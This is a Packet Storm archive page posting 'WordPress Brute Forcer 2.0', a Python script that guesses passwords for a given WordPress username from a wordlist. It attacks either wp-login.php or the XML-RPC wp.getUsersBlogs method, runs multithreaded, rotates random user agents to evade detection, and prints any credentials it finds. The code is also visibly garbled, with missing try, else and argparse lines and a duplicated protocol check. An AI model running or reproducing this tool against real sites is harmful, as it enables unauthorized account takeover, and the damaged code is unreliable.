what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

WordPress Brute Forcer 2.0

WordPress Brute Forcer 2.0
Posted Apr 14, 2015
Authored by Claudio Viviani

This is a python script that performs brute forcing against WordPress installs using a wordlist.

Changes: xml-rpc brute force functionality added.
tags | tool, cracker, python
SHA-256 | 2d97133aba0d51470e503dd301f411312b3310db7a1d1bc94a2801174b8229ca

WordPress Brute Forcer 2.0

Change Mirror Download
#!/usr/bin/env python
# WordPress Brute Force by Claudio Viviani
# Inspired by xSecurity's WordPress Brute Muliththreading
# Tested on Wordpress 3.x and 4.x
# Disclaimer:
# This tool is intended for educational purposes only and the author
# can not be held liable for any kind of damages done whatsoever to your machine,
# or damages caused by some other,creative application of this exploit.
# In any case you disagree with the above statement,stop here.
# Requirements:
# 1) python's httplib2 lib
# Installation: pip install httplib2
# Features:
# 1) Multithreading
# 2) xml-rpc brute force mode
# 3) http and https protocols support
# 4) Random User Agent
# 2015-04-12 v2.0
# 1) Add new feature xml-rpc brute force mode
# 2) Fix minor bugs
# 2015-04-11 v1.1
# 1) optparse (Deprecated since version 2.7) replaced by argparse
# 2) Fix connection bugs

import urllib, httplib, httplib2
import socket, sys, os, os.path, argparse, random
from threading import Thread
from time import sleep

banner = """
___ ___ __
| Y .-----.----.--| .-----.----.-----.-----.-----.
|. | | _ | _| _ | _ | _| -__|__ --|__ --|
|. / \ |_____|__| |_____| __|__| |_____|_____|_____|
|: | |__|
|::.|:. |
`--- ---'
_______ __ _______
| _ .----.--.--| |_.-----| _ .-----.----.----.-----.
|. 1 | _| | | _| -__|. 1___| _ | _| __| -__|
|. _ |__| |_____|____|_____|. __) |_____|__| |____|_____|
|: 1 \ |: |
|::.. . / |::.|
`-------' `---'

W0rdBRUTEpr3ss v2.0

Written by:

Claudio Viviani



https://ffhd.homelab.it (Free Fuzzy Hashes Database)
def randomAgentGen():

userAgent = ['Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.77.4 (KHTML, like Gecko) Version/7.0.5 Safari/537.77.4',
'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:31.0) Gecko/20100101 Firefox/31.0',
'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
'Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53',
'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:30.0) Gecko/20100101 Firefox/30.0',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
'Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36',
'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.1; rv:31.0) Gecko/20100101 Firefox/31.0',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
'Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D201 Safari/9537.53',
'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
'Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0',
'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36',
'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0',
'Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.76.4 (KHTML, like Gecko) Version/7.0.4 Safari/537.76.4',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/7.0.6 Safari/537.78.2',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/538.46 (KHTML, like Gecko) Version/8.0 Safari/538.46',
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.1; rv:30.0) Gecko/20100101 Firefox/30.0',
'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36',
'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10',
'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko',
'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.77.4 (KHTML, like Gecko) Version/6.1.5 Safari/537.77.4',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/34.0.1847.116 Chrome/34.0.1847.116 Safari/537.36',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.77.4 (KHTML, like Gecko) Version/6.1.5 Safari/537.77.4',
'Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0',
'Mozilla/5.0 (iPad; CPU OS 7_1_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D201 Safari/9537.53',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/537.75.14',
'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0',
'Mozilla/5.0 (iPhone; CPU iPhone OS 7_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D167 Safari/9537.53',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/7.0.2 Safari/537.74.9',
'Mozilla/5.0 (X11; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0',
'Mozilla/5.0 (iPhone; CPU iPhone OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11B554a Safari/9537.53',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:31.0) Gecko/20100101 Firefox/31.0',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0',
'Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:31.0) Gecko/20100101 Firefox/31.0',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/537.75.14',
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)',
'Mozilla/5.0 (Windows NT 5.1; rv:30.0) Gecko/20100101 Firefox/30.0',
'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0',
'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
'Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) GSA/ Mobile/11D257 Safari/9537.53',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:31.0) Gecko/20100101 Firefox/31.0',
'Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0',
'Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/36.0.1985.125 Chrome/36.0.1985.125 Safari/537.36',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:30.0) Gecko/20100101 Firefox/30.0',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.3 (KHTML, like Gecko) Version/8.0 Safari/600.1.3',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36']

UA = random.choice(userAgent)
return UA

def urlCMS(url,brutemode):
if url[:8] != "https://" and url[:7] != "https://":
print('\n[X] You must insert https:// or https:// procotol')
# Page login
if brutemode == "std":
url = url+'/wp-login.php'
url = url+'/xmlrpc.php'
return url

def bodyCMS(username,pwd,brutemode):
if brutemode == "std":
body = { 'log':username,
'testcookie':'1' }
body = """<?xml version="1.0" encoding="iso-8859-1"?><methodCall><methodName>wp.getUsersBlogs</methodName>
<params><param><value>%s</value></param><param><value>%s</value></param></params></methodCall>""" % (username, pwd)
return body

def headersCMS(UA,lenbody,brutemode):
if brutemode == "std":
headers = { 'User-Agent': UA,
'Content-type': 'application/x-www-form-urlencoded',
'Cookie': 'wordpress_test_cookie=WP+Cookie+check' }
headers = { 'User-Agent': UA,
'Content-type': 'text/xml',
'Content-Length': "%d" % len(lenbody)}
return headers

def responseCMS(response):
if response['set-cookie'].split(" ")[-1] == "httponly":
return "1"

def connection(url,user,password,UA,timeout,brutemode):

username = user
pwd = password

http = httplib2.Http(timeout=timeout, disable_ssl_certificate_validation=True)

body = bodyCMS(username,pwd,brutemode)

# Headers
headers = headersCMS(UA,body,brutemode)


if brutemode == "std":
response, content = http.request(url, 'POST', headers=headers, body=urllib.urlencode(body))

if str(response.status)[0] == "4" or str(response.status)[0] == "5":
print('[X] HTTP error, code: '+str(response.status))

if responseCMS(response) == "1":
print('[!] Password FOUND!!!')
print('[!] Username: '+user+' Password: '+password)

checkCon = "OK"
return checkCon
response, content = http.request(url, 'POST', headers=headers, body=body)

if str(response.status)[0] == "4" or str(response.status)[0] == "5":
print('[X] HTTP error, code: '+str(response.status))

# Remove all blank and newline chars
xmlcontent = content.replace(" ", "").replace("\n","")

if not "403" in xmlcontent:
print('[!] Password FOUND!!!')
print('[!] Username: '+user+' Password: '+password)

checkCon = "OK"
return checkCon

except socket.timeout:
print('[X] Connection Timeout')
except socket.error:
print('[X] Connection Refused')
except httplib.ResponseNotReady:
print('[X] Server Not Responding')
except httplib2.ServerNotFoundError:
print('[X] Server Not Found')
except httplib2.HttpLib2Error:
print('[X] Connection Error!!')

commandList = argparse.ArgumentParser(sys.argv[0])
commandList.add_argument('-S', '--standard',
help="Standard login brute",
commandList.add_argument('-X', '--xml-rpc',
help="Xml-rpc login brute",
commandList.add_argument('-t', '--target',
help="Insert URL: http[s]://www.victimurl.com[:port]",
commandList.add_argument('-u', '--username',
help="Insert username",
commandList.add_argument('-w', '--wordfilelist',
help="Insert wordlist file",
help="Timeout Value (Default 10s)",

options = commandList.parse_args()

# Check bruteforce mode conflicts
if options.standard and options.xml:
print "\n[X] Select standard [-S] OR xml-rpc [-X] bruteforce mode"

# Check args
if not options.standard and not options.xml:
elif not options.target or not options.username or not options.wordfilelist:

# Set bruteforce mode
if options.standard:

# args to vars
url = options.target
user = options.username
password = options.wordfilelist
timeout = options.timeout

# Check if Wordlist file exists and has readable
if not os.path.isfile(password) and not os.access(password, os.R_OK):
print "[X] Wordlist file is missing or is not readable"

# Open and read Wordlist file
wordlist = open(password).read().split("\n")
# Remove last empty values from wordlist list
del wordlist[-1]
# Total lines (password) in Wordlist file
totalwordlist = len(wordlist)
# Gen Random UserAgent
UA = randomAgentGen()
# Url to url+login_cms_page
url = urlCMS(url,brtmd)

print('[+] Target.....: '+options.target)
print('[+] Wordlist...: '+str(totalwordlist))
print('[+] Username...: '+user)
if brtmd == "std":
print('[+] BruteMode..: Standard')
print('[+] BruteMode..: Xml-Rpc')
print('[+] Connecting.......')

# Check connection with fake-login
if connection(url,user,UA,UA,timeout,brtmd) == "OK":
print('[+] Connection established')

# Reset var for "progress bar"
count = 0

threads = []
for pwd in wordlist:
count += 1
t = Thread(target=connection, args=(url,user,pwd,UA,timeout,brtmd))
sys.stdout.write('[+] Password checked: '+str(count)+'/'+str(totalwordlist))

for a in threads:

# no passwords found
print('\n[X] Password NOT found :(')
Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    52 Files
  • 5
    Sep 5th
    23 Files
  • 6
    Sep 6th
    27 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    1 Files
  • 9
    Sep 9th
    16 Files
  • 10
    Sep 10th
    38 Files
  • 11
    Sep 11th
    21 Files
  • 12
    Sep 12th
    40 Files
  • 13
    Sep 13th
    18 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    21 Files
  • 17
    Sep 17th
    51 Files
  • 18
    Sep 18th
    23 Files
  • 19
    Sep 19th
    48 Files
  • 20
    Sep 20th
    36 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags


packet storm

© 2024 Packet Storm. All rights reserved.

Security Services
Hosting By